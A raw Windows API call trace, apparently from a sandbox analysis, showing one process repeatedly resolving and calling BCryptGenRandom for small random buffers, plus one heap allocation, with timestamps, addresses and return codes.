0x7ffc5bcc36b0 [0271.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0271.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.653] GetProcessHeap () returned 0x440000 [0271.653] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02c50 [0271.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02c51, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a02c51) returned 0x0 [0271.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02c70, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a02c70) returned 0x0 [0271.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02c94, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a02c94) returned 0x0 [0271.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02cb1, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a02cb1) returned 0x0 [0271.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 